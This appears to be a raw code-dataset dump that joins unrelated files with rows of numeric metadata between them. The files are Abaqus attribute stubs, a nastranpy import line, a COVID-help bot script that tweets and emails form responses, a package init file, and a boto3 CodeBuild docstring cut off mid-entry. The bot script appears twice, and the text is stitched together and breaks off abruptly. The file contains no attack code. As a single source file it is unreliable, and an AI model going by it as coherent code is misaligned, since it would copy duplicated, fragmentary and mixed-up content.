# A boolean specifying the state of Auto-stablilization. This attribute is read-only.
autoStabilize: Boolean = OFF
# A boolean specifying the state of convergence for the attempt. This attribute is
# read-only.
isConverged: Boolean = OFF
# A boolean specifying the state of cutback. This attribute is read-only.
isCutBack: Boolean = OFF
# A boolean specifying whether or not reordering is needed. This attribute is read-only.
needsReordering: Boolean = OFF
# An int specifying the number of cutback diagnostics. This attribute is read-only.
numberOfCutbackDiagnostics: str = ''
# An int specifying the number of iterations for the particular attempt. This attribute is
# read-only.
numberOfIterations: str = ''
# An int specifying the number of iterations with severe discontinuities This attribute is
# read-only.
numberOfSevereDiscontinuityIterations: str = ''
# A float specifying the size of the increment of the particular attempt. This attribute
# is read-only.
size: str = ''
| 36.367647 | 96 | 0.705621 | 297 | 2,473 | 5.875421 | 0.225589 | 0.119198 | 0.137536 | 0.174212 | 0.862464 | 0.860745 | 0.860745 | 0.747851 | 0.73639 | 0.73639 | 0 | 0 | 0.23979 | 2,473 | 67 | 97 | 36.910448 | 0.928191 | 0.777598 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cb30b256507833aee13e3ebcd8480256b6562300 | 65 | py | Python | nastranpy/utils/__init__.py | alvarosanz/nastranpy | 3e0ff82683d05a71c93b172c2f6b12c9ae24fce7 | [
"MIT"
] | 3 | 2017-06-23T04:32:02.000Z | 2018-03-27T13:30:19.000Z | nastranpy/utils/__init__.py | alvarosanz/nastranpy | 3e0ff82683d05a71c93b172c2f6b12c9ae24fce7 | [
"MIT"
] | null | null | null | nastranpy/utils/__init__.py | alvarosanz/nastranpy | 3e0ff82683d05a71c93b172c2f6b12c9ae24fce7 | [
"MIT"
] | 3 | 2018-08-11T15:47:08.000Z | 2022-03-06T18:13:48.000Z | from nastranpy.utils.get_skin_bays import get_skin_bays_geometry
| 32.5 | 64 | 0.907692 | 11 | 65 | 4.909091 | 0.727273 | 0.259259 | 0.407407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061538 | 65 | 1 | 65 | 65 | 0.885246 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1dc3550ab611599ce13f25471a23557658e5b0cf | 7,422 | py | Python | main.py | kanakshilledar/covid-bot | 4ee10457db57bbb16a03d317f3c8a6c69f4b1c91 | [
"MIT"
] | null | null | null | main.py | kanakshilledar/covid-bot | 4ee10457db57bbb16a03d317f3c8a6c69f4b1c91 | [
"MIT"
] | null | null | null | main.py | kanakshilledar/covid-bot | 4ee10457db57bbb16a03d317f3c8a6c69f4b1c91 | [
"MIT"
] | null | null | null | import gspread
from oauth2client.service_account import ServiceAccountCredentials
import tweepy
import time
import logging
import pywhatkit
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# starting logging procedure
logging.basicConfig(filename = 'main.log', filemode = 'a', format='%(asctime)s - %(message)s', level=logging.INFO)
logger = logging.getLogger()
# Google Sheets API authorization
SCOPE = ['https://www.googleapis.com/auth/spreadsheets', 'https://www.googleapis.com/auth/drive',]
logger.info('Added SCOPE')
# your json file
creds = ServiceAccountCredentials.from_json_keyfile_name('CREDENTIAL.json', SCOPE)
client = gspread.authorize(creds)
logger.info('Google API Authorization Done')
# Twitter authorization
# add your keys
CONSUMER_KEY = 'CONSUMER API'
CONSUMER_SECRET = 'CONSUMER SECRET'
ACCESS_KEY = 'ACCESS KEY'
ACCESS_SECRET = 'ACCESS SECRET'
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
try:
api.verify_credentials()
logger.info('Twitter API Authorization Done')
except Exception as e:
logger.info('Error During Authentication'.format(e))
# gmail authorization
# sender details
SENDER_ADDRESS = 'EMAIL ADDRESS'
SENDER_PASS = 'EMAIL PASSWORD'
def mailer(name, contact, requirement, location, email, link):
message_content = '''
Hello!
Thank You for filling the form. Here\'s what we have received from you:
\tName: {}
\tContact: {}
\tRequirement: {}
\tLocation: {}
\tEmail: {}
This is your twitter link {}. Please keep monitoring the the replies to this tweet you may find something useful.
Note: This is an auto generated email so please dont reply to this email. We can't guarantee you help but will try our best.
Thank You for using our service
Get Well Soon!
Team CovidBot
'''
# setup MIME
message = MIMEMultipart()
message['From'] = SENDER_ADDRESS
message['To'] = email
message['Subject'] = 'Link for your tweet.'
message.attach(MIMEText(message_content.format(name, contact, requirement, location, email, link), 'plain'))
# create smtp session
logger.info('SMTP Session Created')
session = smtplib.SMTP('smtp.gmail.com', 587)
session.starttls()
session.login(SENDER_ADDRESS, SENDER_PASS)
text = message.as_string()
session.sendmail(SENDER_ADDRESS, email, text)
logger.info('Mail Sent')
session.quit()
curtime = list(time.localtime())
# sending whatsapp message
# pywhatkit.sendwhatmsg('+91' + str(contact), message_content.format(name, contact, requirement, location, email, link), time_hour=curtime[3], time_min=curtime[4] + 1, browser='firefox')
logger.info('Message Sent')
import gspread
from oauth2client.service_account import ServiceAccountCredentials
import tweepy
import time
import logging
import pywhatkit
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
# starting logging procedure
logging.basicConfig(filename = 'main.log', filemode = 'a', format='%(asctime)s - %(message)s', level=logging.INFO)
logger = logging.getLogger()
# Google Sheets API authorization
SCOPE = ['https://www.googleapis.com/auth/spreadsheets', 'https://www.googleapis.com/auth/drive',]
logger.info('Added SCOPE')
# your json file
creds = ServiceAccountCredentials.from_json_keyfile_name('CREDENTIAL.json', SCOPE)
client = gspread.authorize(creds)
logger.info('Google API Authorization Done')
# Twitter authorization
# add your keys
CONSUMER_KEY = 'CONSUMER API'
CONSUMER_SECRET = 'CONSUMER SECRET'
ACCESS_KEY = 'ACCESS KEY'
ACCESS_SECRET = 'ACCESS SECRET'
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
try:
api.verify_credentials()
logger.info('Twitter API Authorization Done')
except Exception as e:
logger.info('Error During Authentication'.format(e))
# gmail authorization
# sender details
SENDER_ADDRESS = 'EMAIL ADDRESS'
SENDER_PASS = 'EMAIL PASSWORD'
def mailer(name, contact, requirement, location, email, link):
message_content = '''
Hello!
Thank You for filling the form. Here\'s what we have received from you:
\tName: {}
\tContact: {}
\tRequirement: {}
\tLocation: {}
\tEmail: {}
This is your twitter link {}. Please keep monitoring the the replies to this tweet you may find something useful.
Note: This is an auto generated email so please dont reply to this email. We can't guarantee you help but will try our best.
Thank You for using our service
Get Well Soon!
Team CovidBot
'''
# setup MIME
message = MIMEMultipart()
message['From'] = SENDER_ADDRESS
message['To'] = email
message['Subject'] = 'Link for your tweet.'
message.attach(MIMEText(message_content.format(name, contact, requirement, location, email, link), 'plain'))
# create smtp session
logger.info('SMTP Session Created')
session = smtplib.SMTP('smtp.gmail.com', 587)
session.starttls()
session.login(SENDER_ADDRESS, SENDER_PASS)
text = message.as_string()
session.sendmail(SENDER_ADDRESS, email, text)
logger.info('Mail Sent')
session.quit()
curtime = list(time.localtime())
# sending whatsapp message
# pywhatkit.sendwhatmsg('+91' + str(contact), message_content.format(name, contact, requirement, location, email, link), time_hour=curtime[3], time_min=curtime[4] + 1, browser='firefox')
logger.info('Message Sent')
# sending tweet
def tweeter(name, requirement, location, contact):
message = '''Name: {}
Requirement: {}
Location: {}
Contact: {}
#COVIDEmergency2021 #covid19 #covid19helperbot
'''
api.update_status(message.format(name, requirement, location, contact))
logger.info('Tweet Sent')
logger.info('Getting Tweet ID')
posts = api.user_timeline()
id = posts[0].id_str
global link
link = 'https://twitter.com/Covid19_helper/status/' + id
logger.info('Link Generated - ' + link)
def responseData(response):
# extracting data from the rows
name = response[1]
contact = response[2]
requirement = response[3]
location = response[4]
email = response[5]
if len(response) != 7:
print(name, requirement, location)
tweeter(name, requirement, location, contact)
sheet.update('G' + str(i), link)
print('[+] tweeted')
mailer(name, contact, requirement, location, email, link)
# waiting 2 seconds
time.sleep(2)
# Finding Workbook to read from
sheet = client.open("User Details (Responses)").sheet1
logger.info('Successfully Opened Responses Worksheet')
# variable to keep check of rows
i = 2
# working on the responses
logger.info('Started Working on Responses')
while True:
try:
response = sheet.row_values(i)
print(response)
responseData(response)
i += 1
logger.info('Response taken')
except IndexError:
logger.info('No new data available')
logger.info('Halt for 60 seconds before retrying')
time.sleep(60)
| 34.202765 | 191 | 0.691188 | 902 | 7,422 | 5.621951 | 0.256098 | 0.043384 | 0.030369 | 0.041412 | 0.819759 | 0.805167 | 0.805167 | 0.796293 | 0.796293 | 0.796293 | 0 | 0.007422 | 0.201293 | 7,422 | 216 | 192 | 34.361111 | 0.848009 | 0.123821 | 0 | 0.748466 | 0 | 0.02454 | 0.348889 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02454 | false | 0.02454 | 0.110429 | 0 | 0.134969 | 0.018405 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
383dbda9a9c5ca45afb04da1b45436d8e944c027 | 89 | py | Python | dca_models/__init__.py | vatsalag99/Deformable-Channel-Attention | d904135fd7be45331a16d9cb84e44f8e1ff5c07e | [
"MIT"
] | 1 | 2020-12-01T20:57:09.000Z | 2020-12-01T20:57:09.000Z | dca_models/__init__.py | vatsalag99/Deformable-Channel-Attention | d904135fd7be45331a16d9cb84e44f8e1ff5c07e | [
"MIT"
] | null | null | null | dca_models/__init__.py | vatsalag99/Deformable-Channel-Attention | d904135fd7be45331a16d9cb84e44f8e1ff5c07e | [
"MIT"
] | null | null | null | from .dca_resnet import *
from .dca_mobilenetv2 import *
from .dca_cifar_resnet import *
| 22.25 | 31 | 0.797753 | 13 | 89 | 5.153846 | 0.461538 | 0.313433 | 0.38806 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.134831 | 89 | 3 | 32 | 29.666667 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
38602661ac3848f1be8c31ecc4fbcb044cdbaf13 | 438,665 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/codebuild/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/codebuild/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/codebuild/client.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def batch_delete_builds(self, ids: List) -> Dict:
"""
Deletes one or more builds.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/BatchDeleteBuilds>`_
**Request Syntax**
::
response = client.batch_delete_builds(
ids=[
'string',
]
)
**Response Syntax**
::
{
'buildsDeleted': [
'string',
],
'buildsNotDeleted': [
{
'id': 'string',
'statusCode': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **buildsDeleted** *(list) --*
The IDs of the builds that were successfully deleted.
- *(string) --*
- **buildsNotDeleted** *(list) --*
Information about any builds that could not be successfully deleted.
- *(dict) --*
Information about a build that could not be successfully deleted.
- **id** *(string) --*
The ID of the build that could not be successfully deleted.
- **statusCode** *(string) --*
Additional information about the build that could not be successfully deleted.
:type ids: list
:param ids: **[REQUIRED]**
The IDs of the builds to delete.
- *(string) --*
:rtype: dict
:returns:
"""
pass
def batch_get_builds(self, ids: List) -> Dict:
"""
Gets information about builds.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/BatchGetBuilds>`_
**Request Syntax**
::
response = client.batch_get_builds(
ids=[
'string',
]
)
**Response Syntax**
::
{
'builds': [
{
'id': 'string',
'arn': 'string',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'currentPhase': 'string',
'buildStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'sourceVersion': 'string',
'resolvedSourceVersion': 'string',
'projectName': 'string',
'phases': [
{
'phaseType': 'SUBMITTED'|'QUEUED'|'PROVISIONING'|'DOWNLOAD_SOURCE'|'INSTALL'|'PRE_BUILD'|'BUILD'|'POST_BUILD'|'UPLOAD_ARTIFACTS'|'FINALIZING'|'COMPLETED',
'phaseStatus': 'SUCCEEDED'|'FAILED'|'FAULT'|'TIMED_OUT'|'IN_PROGRESS'|'STOPPED',
'startTime': datetime(2015, 1, 1),
'endTime': datetime(2015, 1, 1),
'durationInSeconds': 123,
'contexts': [
{
'statusCode': 'string',
'message': 'string'
},
]
},
],
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'secondarySourceVersions': [
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
'artifacts': {
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'logs': {
'groupName': 'string',
'streamName': 'string',
'deepLink': 'string',
's3DeepLink': 'string',
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'buildComplete': True|False,
'initiator': 'string',
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'networkInterface': {
'subnetId': 'string',
'networkInterfaceId': 'string'
},
'encryptionKey': 'string'
},
],
'buildsNotFound': [
'string',
]
}
**Response Structure**
- *(dict) --*
- **builds** *(list) --*
Information about the requested builds.
- *(dict) --*
Information about a build.
- **id** *(string) --*
The unique ID for the build.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build.
- **startTime** *(datetime) --*
When the build process started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build process ended, expressed in Unix time format.
- **currentPhase** *(string) --*
The current build phase.
- **buildStatus** *(string) --*
The current status of the build. Valid values include:
* ``FAILED`` : The build failed.
* ``FAULT`` : The build faulted.
* ``IN_PROGRESS`` : The build is still in progress.
* ``STOPPED`` : The build stopped.
* ``SUCCEEDED`` : The build succeeded.
* ``TIMED_OUT`` : The build timed out.
- **sourceVersion** *(string) --*
Any version identifier for the version of the source code to be built.
- **resolvedSourceVersion** *(string) --*
An identifier for the version of this build's source code.
* For AWS CodeCommit, GitHub, GitHub Enterprise, and BitBucket, the commit ID.
* For AWS CodePipeline, the source revision provided by AWS CodePipeline.
* For Amazon Simple Storage Service (Amazon S3), this does not apply.
- **projectName** *(string) --*
The name of the AWS CodeBuild project.
- **phases** *(list) --*
Information about all previous build phases that are complete and information about any current build phase that is not yet complete.
- *(dict) --*
Information about a stage for a build.
- **phaseType** *(string) --*
The name of the build phase. Valid values include:
* ``BUILD`` : Core build activities typically occur in this build phase.
* ``COMPLETED`` : The build has been completed.
* ``DOWNLOAD_SOURCE`` : Source code is being downloaded in this build phase.
* ``FINALIZING`` : The build process is completing in this build phase.
* ``INSTALL`` : Installation activities typically occur in this build phase.
* ``POST_BUILD`` : Post-build activities typically occur in this build phase.
* ``PRE_BUILD`` : Pre-build activities typically occur in this build phase.
* ``PROVISIONING`` : The build environment is being set up.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``SUBMITTED`` : The build has been submitted.
* ``UPLOAD_ARTIFACTS`` : Build output artifacts are being uploaded to the output location.
- **phaseStatus** *(string) --*
The current status of the build phase. Valid values include:
* ``FAILED`` : The build phase failed.
* ``FAULT`` : The build phase faulted.
* ``IN_PROGRESS`` : The build phase is still in progress.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``STOPPED`` : The build phase stopped.
* ``SUCCEEDED`` : The build phase succeeded.
* ``TIMED_OUT`` : The build phase timed out.
- **startTime** *(datetime) --*
When the build phase started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build phase ended, expressed in Unix time format.
- **durationInSeconds** *(integer) --*
How long, in seconds, between the starting and ending times of the build's phase.
- **contexts** *(list) --*
Additional information about a build phase, especially to help troubleshoot a failed build.
- *(dict) --*
Additional information about a build phase that has an error. You can use this information for troubleshooting.
- **statusCode** *(string) --*
The status code for the context of the build phase.
- **message** *(string) --*
An explanation of the build phase's context. This might include a command ID and an exit code.
- **source** *(dict) --*
Information about the source code to be built.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySourceVersions** *(list) --*
An array of ``ProjectSourceVersion`` objects. Each ``ProjectSourceVersion`` must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --*
An identifier for a source in the build project.
- **sourceVersion** *(string) --*
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- **artifacts** *(dict) --*
Information about the output artifacts for the build.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about build output artifacts.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
